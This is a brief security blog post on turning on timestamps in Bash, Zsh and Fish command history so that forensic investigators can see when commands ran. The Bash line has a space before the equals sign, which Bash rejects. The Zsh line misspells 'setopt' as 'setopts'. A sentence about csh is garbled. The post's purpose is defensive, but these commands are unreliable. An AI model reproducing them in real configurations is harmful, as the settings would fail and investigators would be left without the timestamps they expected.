Two-minute InfoSec — Shell History Timestamps

A new series with a goal on sharing quick wins that can assist organizational security, forensic investigations, incident response and more that you can implement within two minutes or less.

Today’s post is focused on a a feature of nearly any shell — command history. This file is a rich source of evidence for prior user activity, especially on Linux/Unix/macOS systems. One major draw back is that by default, this file does not store timestamps, making analysis of the data difficult and cost a lot of valuable investigative time.

In this post we will cover how to quickly implement timestamps in some common shells including:

• Bash
• Zsh
• Fish

Not all Linux/Unix/macOS platforms are made the same! These are general ways to accomplish this goal, but always test before putting things into production.

Bash

To add for user accounts, modify the ~/.bashrc or ~/.bash_profile files and add the below:

export HISTTIMEFORMAT ="%F %T %z "

This same line can be placed in /etc/bashrc to load across user profiles.

Source: https://linux.die.net/man/1/bash

Zsh

For user accounts, add the below line to ~/.zshrc or /etc/zshrc for system wide implementation.

setopts EXTENDED_HISTORY

This will not only place a timestamp of execution but also the duration of execution — a very handy data point in investigations! Some Z shells, such as csh, though it doesn’t hurt to check!

Source: http://zsh.sourceforge.net/Doc/Release/Options.html#Options

Fish

Enabled by default! Though check your history file is located at:

~/.local/share/fish/fish_history

Have another shell you use and prefer? Or maybe an alternative implementation on a specific OS? Comment and we can add it in to this post for ease of future reference!